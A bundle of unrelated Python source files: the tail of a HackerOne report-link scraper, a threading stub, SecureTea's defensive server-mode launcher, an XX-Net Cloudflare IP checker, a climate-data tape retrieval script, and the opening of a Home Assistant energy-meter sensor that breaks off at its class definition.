report_title = report_title_cards.find(class_="daisy-link ahref daisy-link hacktivity-item__publicly-disclosed spec-hacktivity-item-title") # Hacktivity report title -> Type of vulns
elif (report_title_cards.find('a', {'class': 'daisy-link ahref daisy-link hacktivity-item__hacker-published spec-hacktivity-item-title'}) != None):
report_link = report_title_cards.find('a', {'class': 'daisy-link ahref daisy-link hacktivity-item__hacker-published spec-hacktivity-item-title'}).attrs['href']
report_title = report_title_cards.find(class_="daisy-link ahref daisy-link hacktivity-item__hacker-published spec-hacktivity-item-title") # Hacktivity report title -> Type of vulns
## ---------------- Add info to dictionary ---------------- ##
## Dictionary Key ==> Bug Bounty Program (BBP)
## Dictionary Value ==> Report Links for each (BBP)
report_directory_dictionary[report_directory_str].append(report_link)
bar_graph_label = [] #All the keys resides here
num_reports_list = [] #Number of values for each key resides here
index = 1
for k in report_directory_dictionary:
bug_bounty_names.append(k)
num_reports_list.append(len(report_directory_dictionary[k]))
label_str = str(index) + ") " + k
index += 1
bar_graph_label.append(label_str)
print("There are a total of " + str(len(report_directory_dictionary)) + " different directories.")
print("There are a total of " + str(num_reports) + " different reports.")
## ---------------- Plot Graph ---------------- ##
fig = tpl.figure()
fig.barh(
num_reports_list, # Amount per label
bar_graph_label, # Label
force_ascii = True
)
fig.show()
from selenium import webdriver
input_loop("Which bug bounty program would you like to navigate to? Or you can make another search.\n", webdriver, report_directory_dictionary, bug_bounty_names)
else:
from selenium import webdriver
print("There are a total of 0 bug bounty programs with that search.")
report_directory_dictionary = defaultdict(list)
input_loop("Enter your command. For list of command, use 'help'.\n", webdriver, report_directory_dictionary, bug_bounty_names)
def input_loop(input_command, driver, report_directory_dictionary, bug_bounty_names):
while True:
user_input_str = input(input_command)
command = user_input_str.split(' ', 1)[0]
if (command == "search"):
arguments = user_input_str.split(' ', 1)[1]
hackerone_search(arguments, driver, report_directory_dictionary, bug_bounty_names)
break
elif (command.isnumeric()):
if (len(report_directory_dictionary) == 0):
print("Sorry but there are no reports for scraping.\n")
else:
key = bug_bounty_names[int(command) - 1]
print(key)
for reports in report_directory_dictionary[key]:
print(reports)
elif (command == "quit" or command == "exit"):
print("Goodbye!")
exit()
else:
print("No such command. Try using 'help'.\n")
## ---------------- Main code ---------------- ##
report_directory_dictionary = defaultdict(list)
bug_bounty_names = []
input_loop("Enter your command. For list of command, use 'help'.\n", webdriver, report_directory_dictionary, bug_bounty_names)
|
connect.py
|
import threading
#----------------------------------------------------------------------------------
"""Create a thread to handle the logging in of a user into an email system
"""
#----------------------------------------------------------------------------------
def connectToMailSystem():
"""thread worker function"""
print 'Worker\n'
return
threads = []
t = threading.Thread(target=connectToMailSystem)
threads.append(t)
t.start()
|
server_mode.py
|
# -*- coding: utf-8 -*-
u"""Server Mode for SecureTea.
Project:
╔═╗┌─┐┌─┐┬ ┬┬─┐┌─┐╔╦╗┌─┐┌─┐
╚═╗├┤ │ │ │├┬┘├┤ ║ ├┤ ├─┤
╚═╝└─┘└─┘└─┘┴└─└─┘ ╩ └─┘┴ ┴
Author: Abhishek Sharma <abhishek_official@hotmail.com> , Jul 28 2019
Version: 1.5.1
Module: SecureTea
"""
# Import all the modules necessary for server mode
from securetea.lib.ids import secureTeaIDS
from securetea.lib.waf.Server import SecureTeaWaf
from securetea.lib.log_monitor.system_log import engine
from securetea.lib.log_monitor.server_log.secureTeaServerLog import SecureTeaServerLog
from securetea.lib.auto_server_patcher.secureTeaServerPatcher import SecureTeaAutoServerPatcher
from securetea.lib.web_deface.secureTeaWebDeface import WebDeface
from securetea.lib.antivirus.secureTeaAntiVirus import SecureTeaAntiVirus
from securetea.lib.firewall import secureTeaFirewall
from securetea import logger
import multiprocessing
import sys
class ServerMode(object):
"""ServerMode class."""
def __init__(self, debug=False, cred=None):
"""
Initialize ServerMode.
Args:
debug (bool): Log on terminal or not
cred (dict): Configuration credentials
Raises:
None
Returns
None
"""
self.debug = debug
# Initialize logger
self.logger = logger.SecureTeaLogger(
__name__,
debug=self.debug
)
# Initialize credentials
if cred is not None:
self.cred = cred
else:
self.logger.log(
"No configuraton parameters found, exiting",
logtype="error"
)
sys.exit(0)
# Initialize objects presence as false
self.firewall = False
self.waf=False
self.ids = False
self.antivirus = False
self.auto_server_patcher = False
self.web_deface = False
self.server_log = False
self.system_log = False
# Initialize empty process pool list
self.process_pool = []
def create_objects(self):
"""
Create module (Firewall, IDS, AntiVirus,
Auto Server Patcher, Web Deface) objects if
configuraton parameters are available for those.
Args:
None
Raises:
None
Returns:
None
"""
if self.cred.get("firewall"):
try:
self.logger.log(
"Initializing Firewall object",
logtype="info"
)
# Initialize Firewall object
self.firewallObj = secureTeaFirewall.SecureTeaFirewall(cred=self.cred,
debug=self.debug)
self.firewall = True
self.logger.log(
"Initialized Firewall object",
logtype="info"
)
except KeyError:
self.logger.log(
"Firewall configuration parameter not configured.",
logtype="error"
)
except Exception as e:
self.logger.log(
"Error occured: " + str(e),
logtype="error"
)
if self.cred.get("waf"):
try:
self.logger.log(
"Initializing WAF object",
logtype="info"
)
# Initialize WAF object
self.waf_obj=SecureTeaWaf.SecureTeaWaf(cred=self.cred["waf"],debug=self.debug)
self.waf=True
self.logger.log(
"Initialized WAF object",
logtype="info"
)
except KeyError :
self.logger.log(
"Web Application Firewall (WAF) parameter not configured.",
logtype="error"
)
except Exception as e:
self.logger.log(
"Error occured: " + str(e),
logtype="error"
)
if self.cred.get("ids"):
try:
self.logger.log(
"Initializing IDS object",
logtype="info"
)
# Initialize IDS object
self.ids_obj = secureTeaIDS.SecureTeaIDS(cred=self.cred['ids'],
debug=self.debug)
self.ids = True
self.logger.log(
"Initialized IDS object",
logtype="info"
)
except KeyError:
self.logger.log(
"Intrusion Detection System (IDS) parameter not configured.",
logtype="error"
)
except Exception as e:
self.logger.log(
"Error occured: " + str(e),
logtype="error"
)
if self.cred.get("auto_server_patcher"):
try:
self.logger.log(
"Initializing patcher object"
)
# Initialize Patcher object
self.patcher_obj = SecureTeaAutoServerPatcher(debug=self.debug,
cred=self.cred["auto_server_patcher"])
self.auto_server_patcher = True
self.logger.log(
"Initialized patcher object"
)
except KeyError:
self.logger.log(
"Auto server patcher parameters not configured.",
logtype="error"
)
except Exception as e:
self.logger.log(
"Error occured: " + str(e),
logtype="error"
)
if self.cred.get("antivirus"):
try:
# Initialize AntiVirus object
self.logger.log(
"Initializing AntiVirus object",
logtype="info"
)
# Initialize AntiVirus object
self.antivirus_obj = SecureTeaAntiVirus(debug=self.debug,
cred=self.cred["antivirus"])
self.antivirus = True
self.logger.log(
"Initialized AntiVirus object",
logtype="info"
)
except KeyError:
self.logger.log(
"AntiVirus parameters not configured.",
logtype="error"
)
except Exception as e:
self.logger.log(
"Error occured: " + str(e),
logtype="error"
)
# Only debug configuratons are required for System Log Monitor, hnece create them plainly
try:
self.logger.log(
"Initializing System Log Monitor object",
logtype="info"
)
# Initialize SystemLogEngine object
self.system_log_obj = engine.SystemLogEngine(debug=self.debug)
self.system_log = True
self.logger.log(
"Initialized System Log Monitor object",
logtype="info"
)
except Exception as e:
self.logger.log(
"Error occured: " + str(e),
logtype="error"
)
if self.cred.get("web_deface"):
try:
self.logger.log(
"Initializing Web Deface object",
logtype="info"
)
# Initialize WebDeface object
self.web_deface_obj = WebDeface(debug=self.debug,
path=self.cred['web_deface']['path'],
server_name=self.cred['web_deface']['server-name'])
self.web_deface = True
self.logger.log(
"Initialized Web Deface object",
logtype="info"
)
except KeyError:
self.logger.log(
"Web Deface Detection parameters not configured.",
logtype="error"
)
except Exception as e:
self.logger.log(
"Error occured: " + str(e),
logtype="error"
)
if self.cred.get("server_log"):
try:
self.logger.log(
"Initializing Server Log Monitor object",
logtype="info"
)
server_cred = self.cred['server_log']
# Initialize Server Log Monitor object
self.server_log_obj = SecureTeaServerLog(debug=self.debug,
log_type=server_cred['log-type'],
log_file=server_cred['log-file'],
window=server_cred['window'],
ip_list=server_cred['ip-list'],
status_code=server_cred['status-code'])
self.server_log = True
self.logger.log(
"Initialized Server Log Monitor object",
logtype="info"
)
except KeyError:
self.logger.log(
"Server Log parameters not configured.",
logtype="error"
)
except Exception as e:
self.logger.log(
"Error occured: " + str(e),
logtype="error"
)
def create_process(self):
"""
Create process for the initialized objects.
Args:
None
Raises:
None
Returns:
None
"""
if self.firewall: # if Firewall object is initialized
firewall_process = multiprocessing.Process(target=self.firewallObj.start_firewall)
self.process_pool.append(firewall_process)
if self.waf:
waf_process=multiprocessing.Process(target=self.waf_obj.startWaf)
self.process_pool.append(waf_process)
if self.ids: # if IDS object is initialized
ids_process = multiprocessing.Process(target=self.ids_obj.start_ids)
self.process_pool.append(ids_process)
if self.auto_server_patcher: # if Auto Server Patcher is initialized
auto_server_patcher_process = multiprocessing.Process(target=self.patcher_obj.start)
self.process_pool.append(auto_server_patcher_process)
if self.antivirus: # if AntiVirus object is initialized
antivirus_process = multiprocessing.Process(target=self.antivirus_obj.start)
self.process_pool.append(antivirus_process)
if self.web_deface: # if Web Deface object is initialized
web_deface_process = multiprocessing.Process(target=self.web_deface_obj.start)
self.process_pool.append(web_deface_process)
if self.system_log: # if System Log Monitor object is initialized
system_log_process = multiprocessing.Process(target=self.system_log_obj.run)
self.process_pool.append(system_log_process)
if self.server_log: # if Server Log Monitor object is initialized
server_log_process = multiprocessing.Process(target=self.server_log_obj.run)
self.process_pool.append(server_log_process)
def start_process(self):
"""
Start all the process in the process pool
and terminate gracefully in Keyboard Interrupt.
Args:
None
Raises:
None
Returns:
None
"""
try:
for process in self.process_pool:
process.start()
for process in self.process_pool:
process.join()
except KeyboardInterrupt:
for process in self.process_pool:
process.terminate()
except Exception as e:
self.logger.log(
"Error occured: " + str(e),
logtype="error"
)
def start_server_mode(self):
"""
Start SecureTea in server mode.
Args:
None
Raises:
None
Returns:
None
"""
# Create / initialize required objects
self.create_objects()
# Create process for the objects
self.create_process()
# Start the process
self.start_process()
|
check_ip.py
|
#!/usr/bin/env python2
# coding:utf-8
import sys
import os
import json
import threading
current_path = os.path.dirname(os.path.abspath(__file__))
root_path = os.path.abspath( os.path.join(current_path, os.pardir, os.pardir, os.pardir))
data_path = os.path.abspath(os.path.join(root_path, os.pardir, os.pardir, 'data'))
module_data_path = os.path.join(data_path, 'x_tunnel')
python_path = os.path.abspath( os.path.join(root_path, 'python27', '1.0'))
sys.path.append(root_path)
noarch_lib = os.path.abspath( os.path.join(python_path, 'lib', 'noarch'))
sys.path.insert(0, noarch_lib)
if sys.platform == "win32":
win32_lib = os.path.abspath( os.path.join(python_path, 'lib', 'win32'))
sys.path.append(win32_lib)
elif sys.platform.startswith("linux"):
linux_lib = os.path.abspath( os.path.join(python_path, 'lib', 'linux'))
sys.path.insert(1, linux_lib)
elif sys.platform == "darwin":
darwin_lib = os.path.abspath( os.path.join(python_path, 'lib', 'darwin'))
sys.path.append(darwin_lib)
extra_lib = "/System/Library/Frameworks/Python.framework/Versions/2.7/Extras/lib/python"
sys.path.append(extra_lib)
import utils
import xlog
logger = xlog.getLogger("cloudflare_front")
logger.set_buffer(500)
from front_base.openssl_wrap import SSLContext
from front_base.connect_creator import ConnectCreator
from front_base.check_ip import CheckIp
from front_base.host_manager import HostManagerBase
from config import Config
def check_all_domain(check_ip):
with open(os.path.join(current_path, "front_domains.json"), "r") as fd:
content = fd.read()
cs = json.loads(content)
for host in cs:
host = "scan1." + host
res = check_ip.check_ip(ip, host=host, wait_time=wait_time)
if not res or not res.ok:
xlog.warn("host:%s fail", host)
else:
xlog.info("host:%s ok", host)
class CheckAllIp(object):
def __init__(self, check_ip, host):
self.check_ip = check_ip
self.host = host
self.lock = threading.Lock()
self.in_fd = open("good_ip.txt", "r")
self.out_fd = open(
os.path.join(module_data_path, "cloudflare_checked_ip.txt"),
"w"
)
def get_ip(self):
with self.lock:
while True:
line = self.in_fd.readline()
if not line:
raise Exception()
try:
ip = line.split()[0]
return ip
except:
continue
def write_ip(self, ip, host, handshake):
with self.lock:
self.out_fd.write("%s %s gws %d 0 0\n" % (ip, host, handshake))
self.out_fd.flush()
def checker(self):
while True:
try:
ip = self.get_ip()
except Exception as e:
xlog.info("no ip left")
return
try:
res = self.check_ip.check_ip(ip, sni=host, host=host)
except Exception as e:
xlog.warn("check fail:%s except:%r", e)
continue
if not res or not res.ok:
xlog.debug("check fail:%s fail", ip)
continue
self.write_ip(ip, res.domain, res.handshake_time)
def run(self):
for i in range(0, 10):
threading.Thread(target=self.checker).start()
def check_all_ip(check_ip):
check = CheckAllIp(check_ip, "scan1.movistar.gq")
check.run()
if __name__ == "__main__":
# case 1: only ip
# case 2: ip + domain
# connect use domain
ip = "141.101.120.131"
host = "xx-net.net"
sni = host
args = list(sys.argv[1:])
if len(args):
if utils.check_ip_valid(args[0]):
ip = args.pop(0)
if len(args):
host = args.pop(0)
sni = host
if len(args):
sni = args.pop(0)
# print("Usage: check_ip.py [ip] [top_domain] [wait_time=0]")
xlog.info("test ip:%s", ip)
xlog.info("host:%s", host)
xlog.info("sni:%s", sni)
wait_time = 0
config_path = os.path.join(module_data_path, "cloudflare_front.json")
config = Config(config_path)
openssl_context = SSLContext(logger)
host_manager = HostManagerBase()
connect_creator = ConnectCreator(logger, config, openssl_context, host_manager, debug=True)
check_ip = CheckIp(logger, config, connect_creator)
#check_all_domain(check_ip)
#check_all_ip(check_ip)
#exit(0)
res = check_ip.check_ip(ip, sni=sni, host=host, wait_time=wait_time)
if not res:
xlog.warn("connect fail")
elif res.ok:
xlog.info("success, domain:%s handshake:%d", res.host, res.handshake_time)
else:
xlog.warn("not support")
|
retrieve_request.py
|
#!/usr/bin/env python
"""
retrieve_request.py
This script is run by the admin to perform a retrieval request.
Currently, the MOOSE and ET clients are installed on different servers. It
is therefore assumed that all of the data in a retrieval is on a single tape
system, but this is not checked by this script. `split_retrieve_request.py`
and `auto_retrieve.py` can be used to split requests and run them on the
appropriate tape systems respectively.
"""
from __future__ import unicode_literals, division, absolute_import
import argparse
import datetime
import glob
from itertools import chain
import logging.config
from multiprocessing import Process, Manager
import os
import random
import shutil
import subprocess
import sys
import time
import traceback
import cf_units
import django
django.setup()
from django.contrib.auth.models import User
from django.utils import timezone
from pdata_app.models import Settings, RetrievalRequest, EmailQueue, DataFile
from pdata_app.utils.common import (md5, sha256, adler32, construct_drs_path,
get_temp_filename, is_same_gws, run_command,
date_filter_files, PAUSE_FILES, grouper)
from pdata_app.utils.dbapi import match_one
__version__ = '0.1.0b1'
DEFAULT_LOG_LEVEL = logging.WARNING
DEFAULT_LOG_FORMAT = '%(levelname)s: %(message)s'
logger = logging.getLogger(__name__)
# The top-level directory to write output data to
BASE_OUTPUT_DIR = Settings.get_solo().base_output_dir
# The number of processes that et_get.py should use.
# Between 5 and 10 are recommended
MAX_ET_GET_PROC = 2
# The maximum number of retrievals to run in parallel
MAX_TAPE_GET_PROC = 5
# The maximum number of files to get from MASS in one moo get command
# to avoid the length of the command being longer than the shell can manage
MAX_MASS_FILES = 200
class ChecksumError(Exception):
def __init__(self, message=''):
"""
An exception to indicate that a data file's checksum does not match
the value recorded in the database.
:param str message: The error message text.
"""
Exception.__init__(self)
self.message = message
def parallel_get_urls(tapes, args):
"""
Get several tape URLs in parallel so that MOOSE can group retrievals
together to minimise the number of tape loads and ET retrievals can run
on multiple tape drives simultaneously.
:param dict tapes: The keys are the tape URLs to retrieve. The values are
a list of DataFile objects to retrieve for that URL.
:param argparse.Namespace args: The parsed command line arguments
namespace.
"""
jobs = []
manager = Manager()
params = manager.Queue()
error_event = manager.Event()
for i in range(MAX_TAPE_GET_PROC):
p = Process(target=parallel_worker, args=(params, error_event))
jobs.append(p)
p.start()
tape_urls_list = [(tape_url, tapes[tape_url], args) for tape_url in tapes]
null_arguments = (None, None, None)
iters = chain(tape_urls_list, (null_arguments,) * MAX_TAPE_GET_PROC)
for iter in iters:
params.put(iter)
for j in jobs:
j.join()
if error_event.is_set():
logger.error('One or more retrievals failed.')
sys.exit(1)
def parallel_worker(params, error_event):
"""
The worker function that unpacks the parameters and calls the usual
serial function.
:param multiprocessing.Manager.Queue params: the queue to get function
call parameters from
:param multiprocessing.Manager.Event error_event: If set then a
catastrophic error has occurred in another process and processing
should end
"""
while True:
# close existing connections so that a fresh connection is made
django.db.connections.close_all()
if error_event.is_set():
return
tape_url, data_files, args = params.get()
if tape_url is None:
return
# don't start any new work if we want to pause the system
for pause_file in PAUSE_FILES:
if tape_url.startswith(pause_file):
if os.path.exists(PAUSE_FILES[pause_file]):
logger.warning('Stopping due to {}'.
format(PAUSE_FILES[pause_file]))
error_event.set()
return
try:
get_tape_url(tape_url, data_files, args)
except:
exc_type, exc_value, exc_tb = sys.exc_info()
tb_list = traceback.format_exception(exc_type, exc_value, exc_tb)
tb_string = '\n'.join(tb_list)
logger.error('Fetching {} failed.\n{}'.format(tape_url, tb_string))
error_event.set()
def get_tape_url(tape_url, data_files, args):
"""
Get all of the data from `tape_url`.
:param str tape_url: The URL of the tape data to fetch.
:param list data_files: DataFile objects corresponding to the data files
required.
:param argparse.Namespace args: The parsed command line arguments
namespace.
"""
if tape_url.startswith('et:'):
get_et_url(tape_url, data_files, args)
elif tape_url.startswith('moose:'):
for file_chunk in grouper(data_files, MAX_MASS_FILES):
get_moose_url(tape_url, list(file_chunk), args)
else:
msg = ('Tape url {} is not a currently supported type of tape.'.
format(tape_url))
logger.error(msg)
raise NotImplementedError(msg)
def get_moose_url(tape_url, data_files, args):
"""
Get all of the data from `tape_url`, which is already known to be a MOOSE
url. Data is not cached and is instead copied directly into the destination
directory.
:param str tape_url: The url to fetch
:param list data_files: The DataFile objects to retrieve
:param argparse.Namespace args: The parsed command line arguments
namespace.
"""
logger.debug('Starting restoring {}'.format(tape_url))
# because the PRIMAVERA data that has been stored in MASS is in a DRS
# directory structure already then all files that have an identical
# tape_url will be placed in the same output directory
drs_path = construct_drs_path(data_files[0])
if not args.alternative:
drs_dir = os.path.join(BASE_OUTPUT_DIR, drs_path)
else:
drs_dir = os.path.join(args.alternative, drs_path)
# create the path if it doesn't exist
if not os.path.exists(drs_dir):
try:
os.makedirs(drs_dir)
except OSError:
# if running in parallel, another process could have created this
# directory at the same time and so wait a random time less than
# one second. If it fails a second time then there is a genuine
# problem
time.sleep(random.random())
if not os.path.exists(drs_dir):
os.makedirs(drs_dir)
moose_urls = ['{}/{}'.format(tape_url,
df.name if not args.incoming
else df.incoming_name) for df in data_files]
cmd = 'moo get -I {} {}'.format(' '.join(moose_urls), drs_dir)
logger.debug('MOOSE command is:\n{}'.format(cmd))
try:
cmd_out = run_command(cmd)
except RuntimeError as exc:
logger.error('MOOSE command failed\n{}'.
format(exc.__str__()))
sys.exit(1)
logger.debug('Restored {}'.format(tape_url))
_remove_data_license_files(drs_dir)
for data_file in data_files:
filename = (data_file.name if not args.incoming
else data_file.incoming_name)
if not args.skip_checksums:
try:
_check_file_checksum(
data_file,
os.path.join(drs_dir, filename)
)
except ChecksumError:
# warning message has already been displayed and so move on
# to next file
continue
# create symbolic link from main directory if storing data in an
# alternative directory
if args.alternative:
primary_path = os.path.join(BASE_OUTPUT_DIR, drs_path)
if not os.path.exists(primary_path):
os.makedirs(primary_path)
primary_file = os.path.join(primary_path,filename)
if not os.path.exists(primary_file):
os.symlink(os.path.join(drs_dir,filename),
primary_file)
data_file.directory = drs_dir
data_file.online = True
try:
data_file.save()
except django.db.utils.IntegrityError:
logger.error('data_file.save() failed for {} {}'.
format(data_file.directory, filename))
raise
def get_et_url(tape_url, data_files, args):
"""
Get all of the data from `tape_url`, which is already known to be an ET url.
:param str tape_url: The url to fetch
:param list data_files: The files to retrieve
:param argparse.Namespace args: The parsed command line arguments
namespace.
"""
logger.debug('Starting restoring {}'.format(tape_url))
# make a file containing the paths of the files to retrieve from tape
filelist_name = get_temp_filename('et_files.txt')
with open(filelist_name, 'w') as fh:
for data_file in data_files:
filename = (data_file.name if not args.incoming
else data_file.incoming_name)
fh.write(os.path.join(data_file.incoming_directory, filename)
+ '\n')
logger.debug('File list written to {}'.format(filelist_name))
if args.alternative:
base_dir = args.alternative
else:
base_dir = BASE_OUTPUT_DIR
batch_id = int(tape_url.split(':')[1])
retrieval_dir = os.path.normpath(
os.path.join(base_dir, '..', '.et_retrievals',
'ret_{:04}'.format(args.retrieval_id),
'batch_{:05}'.format(batch_id)))
if not os.path.exists(retrieval_dir):
os.makedirs(retrieval_dir)
logger.debug('Restoring to {}'.format(retrieval_dir))
cmd = ('/usr/bin/python /usr/bin/et_get.py -f {} -r {} -t {}'.
format(filelist_name, retrieval_dir,
MAX_ET_GET_PROC))
logger.debug('et_get.py command is:\n{}'.format(cmd))
try:
cmd_out = run_command(cmd)
pass
except RuntimeError as exc:
logger.error('et_get.py command failed\n{}'.format(exc.__str__()))
sys.exit(1)
copy_et_files_into_drs(data_files, retrieval_dir, args)
try:
os.remove(filelist_name)
except OSError:
logger.warning('Unable to delete temporary file: {}'.
format(filelist_name))
try:
shutil.rmtree(retrieval_dir)
except OSError:
logger.warning('Unable to delete retrieval directory: {}'.
format(retrieval_dir))
logger.debug('Restored {}'.format(tape_url))
def copy_et_files_into_drs(data_files, retrieval_dir, args):
"""
Copy files from the restored data cache into the DRS structure.
:param list data_files: The DataFile objects to copy.
:param str retrieval_dir: The path that the files were retrieved to.
:param argparse.Namespace args: The parsed command line arguments
namespace.
"""
logger.debug('Copying elastic tape files')
for data_file in data_files:
file_submission_dir = data_file.incoming_directory
filename = (data_file.name if not args.incoming
else data_file.incoming_name)
extracted_file_path = os.path.join(retrieval_dir,
file_submission_dir.lstrip('/'),
filename)
if not os.path.exists(extracted_file_path):
msg = ('Unable to find file {} in the extracted data at {}. The '
'expected path was {}'.format(filename, retrieval_dir,
extracted_file_path))
logger.error(msg)
sys.exit(1)
drs_path = construct_drs_path(data_file)
if not args.alternative:
drs_dir = os.path.join(BASE_OUTPUT_DIR, drs_path)
else:
drs_dir = os.path.join(args.alternative, drs_path)
dest_file_path = os.path.join(drs_dir, filename)
# create the path if it doesn't exist
if not os.path.exists(drs_dir):
os.makedirs(drs_dir)
if os.path.exists(dest_file_path):
msg = 'File already exists on disk: {}'.format(dest_file_path)
logger.warning(msg)
else:
os.rename(extracted_file_path, dest_file_path)
if not args.skip_checksums:
try:
_check_file_checksum(data_file, dest_file_path)
except ChecksumError:
# warning message has already been displayed and so move on
# to next file
continue
# create symbolic link from main directory if storing data in an
# alternative directory
if args.alternative and not is_same_gws(dest_file_path,
BASE_OUTPUT_DIR):
primary_path = os.path.join(BASE_OUTPUT_DIR, drs_path)
if not os.path.exists(primary_path):
os.makedirs(primary_path)
os.symlink(dest_file_path,
os.path.join(primary_path, filename))
# set directory and set status as being online
data_file.directory = drs_dir
data_file.online = True
data_file.save()
logger.debug('Finished copying elastic tape files')
def _check_file_checksum(data_file, file_path):
"""
Check that a restored file's checksum matches the value in the database.
:param pdata_app.models.DataFile data_file: the database file object
:param str file_path: the path to the restored file
:raises ChecksumError: if the checksums don't match.
"""
checksum_methods = {'ADLER32': adler32,
'MD5': md5,
'SHA256': sha256}
# there is only likely to be one checksum and so chose the last one
if not cmd_args.incoming:
checksum_obj = data_file.checksum_set.last()
else:
checksum_obj = data_file.tapechecksum_set.last()
if not checksum_obj:
msg = ('No checksum exists in the database. Skipping check for {}'.
format(file_path))
logger.warning(msg)
return
file_checksum = checksum_methods[checksum_obj.checksum_type](file_path)
if file_checksum != checksum_obj.checksum_value:
msg = ('Checksum for restored file does not match its value in the '
'database.\n {}: {}:{}\nDatabase: {}:{}'.format(file_path,
checksum_obj.checksum_type, file_checksum,
checksum_obj.checksum_type, checksum_obj.checksum_value))
logger.warning(msg)
raise ChecksumError(msg)
def _email_user_success(retrieval):
"""
Send an email to request's creator advising them that their data's been
successfully restored.
:param pdata_app.models.RetrievalRequest retrieval: the retrieval object
"""
contact_user_id = Settings.get_solo().contact_user_id
contact_user = User.objects.get(username=contact_user_id)
msg = (
'Dear {},\n'
'\n'
'Your retrieval request number {} has now been restored from '
'tape to group workspace. The data will be available in the DRS '
'directory structure at {}.\n'
'\n'
'To free up disk space on the group workspaces we would be grateful '
'if this data could be marked as finished at '
'https://prima-dm.ceda.ac.uk/retrieval_requests/ as soon as you have '
'finished analysing it.\n'
'\n'
'Thanks,\n'
'\n'
'{}'.format(retrieval.requester.first_name, retrieval.id,
BASE_OUTPUT_DIR, contact_user.first_name)
)
_email = EmailQueue.objects.create(
recipient=retrieval.requester,
subject=('[PRIMAVERA_DMT] Retrieval Request {} Complete'.
format(retrieval.id)),
message=msg
)
def _email_admin_failure(retrieval):
"""
Send an email to the admin user advising them that the retrieval failed.
:param pdata_app.models.RetrievalRequest retrieval: the retrieval object
"""
contact_user_id = Settings.get_solo().contact_user_id
contact_user = User.objects.get(username=contact_user_id)
msg = (
'Dear {},\n'
'\n'
'Retrieval request number {} failed.\n'
'\n'
'Thanks,\n'
'\n'
'{}'.format(contact_user.first_name, retrieval.id,
contact_user.first_name)
)
_email = EmailQueue.objects.create(
recipient=contact_user,
subject=('[PRIMAVERA_DMT] Retrieval Request {} Failed'.
format(retrieval.id)),
message=msg
)
def _remove_data_license_files(dir_path):
"""
Delete any Met Office Data License files from the directory specified.
:param str dir_path: The directory to remove files from.
"""
license_file_glob = 'MetOffice_data_licence.*'
for lic_file in glob.iglob(os.path.join(dir_path, license_file_glob)):
try:
os.remove(lic_file)
except OSError:
logger.warning('Unable to delete license file {}'.format(lic_file))
def parse_args():
"""
Parse command-line arguments
"""
parser = argparse.ArgumentParser(description='Perform a PRIMAVERA '
'retrieval request.')
parser.add_argument('retrieval_id', help='the id of the retrieval request '
'to carry out.', type=int)
parser.add_argument('-a', '--alternative', help="store data in alternative "
"directory and create a symbolic link to each file from the main "
"retrieval directory")
parser.add_argument('-s', '--skip_checksums', help="don't check the "
"checksums on restored files.", action='store_true')
parser.add_argument('-i', '--incoming', help="restore the incoming "
"filename.", action='store_true')
parser.add_argument('-l', '--log-level', help='set logging level to one of '
'debug, info, warn (the default), or error')
parser.add_argument('--version', action='version',
version='%(prog)s {}'.format(__version__))
args = parser.parse_args()
return args
def main(args):
"""
Main entry point
"""
logger.debug('Starting retrieve_request.py for retrieval {}'.
format(args.retrieval_id))
# check retrieval
retrieval = match_one(RetrievalRequest, id=args.retrieval_id)
if not retrieval:
logger.error('Unable to find retrieval id {}'.format(
args.retrieval_id))
sys.exit(1)
if retrieval.date_complete:
logger.error('Retrieval {} was already completed, at {}.'.
format(retrieval.id,
retrieval.date_complete.strftime('%Y-%m-%d %H:%M')))
sys.exit(1)
tapes = {}
for data_req in retrieval.data_request.all():
all_files = data_req.datafile_set.filter(online=False)
filtered_files = date_filter_files(all_files, retrieval.start_year,
retrieval.end_year)
if filtered_files is None:
continue
tape_urls = list(set([qs['tape_url']
for qs in filtered_files.values('tape_url')]))
tape_urls.sort()
for tape_url in tape_urls:
url_files = filtered_files.filter(tape_url=tape_url)
if tape_url in tapes:
tapes[tape_url] = list(chain(tapes[tape_url], url_files))
else:
tapes[tape_url] = list(url_files)
# lets get parallel to speed things up
parallel_get_urls(tapes, args)
# get a fresh DB connection after exiting from parallel operation
django.db.connections.close_all()
# check that all files were restored
failed_files = False
for data_req in retrieval.data_request.all():
all_files = data_req.datafile_set.filter(online=False)
missing_files = date_filter_files(all_files, retrieval.start_year,
retrieval.end_year)
if missing_files is None:
continue
if missing_files.count() != 0:
failed_files = True
if failed_files:
_email_admin_failure(retrieval)
logger.error('Failed retrieve_request.py for retrieval {}'.
format(args.retrieval_id))
else:
# set date_complete in the db
retrieval.date_complete = timezone.now()
retrieval.save()
# send an email to advise the user that their data's been restored
_email_user_success(retrieval)
logger.debug('Completed retrieve_request.py for retrieval {}'.
format(args.retrieval_id))
if __name__ == "__main__":
cmd_args = parse_args()
# determine the log level
if cmd_args.log_level:
try:
log_level = getattr(logging, cmd_args.log_level.upper())
except AttributeError:
logger.setLevel(logging.WARNING)
logger.error('log-level must be one of: debug, info, warn or error')
sys.exit(1)
else:
log_level = DEFAULT_LOG_LEVEL
# configure the logger
logging.config.dictConfig({
'version': 1,
'disable_existing_loggers': False,
'formatters': {
'standard': {
'format': DEFAULT_LOG_FORMAT,
},
},
'handlers': {
'default': {
'level': log_level,
'class': 'logging.StreamHandler',
'formatter': 'standard'
},
},
'loggers': {
'': {
'handlers': ['default'],
'level': log_level,
'propagate': True
}
}
})
# run the code
main(cmd_args)
|
sensor.py
|
"""
Use serial protocol of EMU2 meter to obtain state of the connected meter.
For more details about this component, please refer to the documentation
at https://github.com/jrhorrisberger/home-assistant/blob/master/custom_components/rainforest/readme.md
"""
from homeassistant.helpers.entity import Entity
import homeassistant.helpers.config_validation as cv
from homeassistant.components.sensor import PLATFORM_SCHEMA
from homeassistant.const import (
CONF_NAME, EVENT_HOMEASSISTANT_STOP)
import logging
import voluptuous as vol
from threading import Thread
__version__ = '0.2.1'
_LOGGER = logging.getLogger(__name__)
DOMAIN = "rainforest"
DEFAULT_NAME = "Rainforest Energy Monitoring Unit"
CONF_PORT = 'port'
ATTR_DEVICE_MAC_ID = "Device MAC ID"
ATTR_METER_MAC_ID = "Meter MAC ID"
ATTR_TEIR = "Price Teir"
ATTR_PRICE = "Price"
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({
vol.Required(CONF_PORT): cv.string,
vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,
})
async def async_setup_platform(hass, config, async_add_entities, discovery_info=None):
_LOGGER.debug("Loading")
port = config.get(CONF_PORT)
sensor_name = config.get(CONF_NAME)
sensor = EMU2Sensor(sensor_name, port)
hass.bus.async_listen_once(
EVENT_HOMEASSISTANT_STOP, sensor.stop_serial_read())
async_add_entities([sensor])
class EMU2Sensor(Entity):
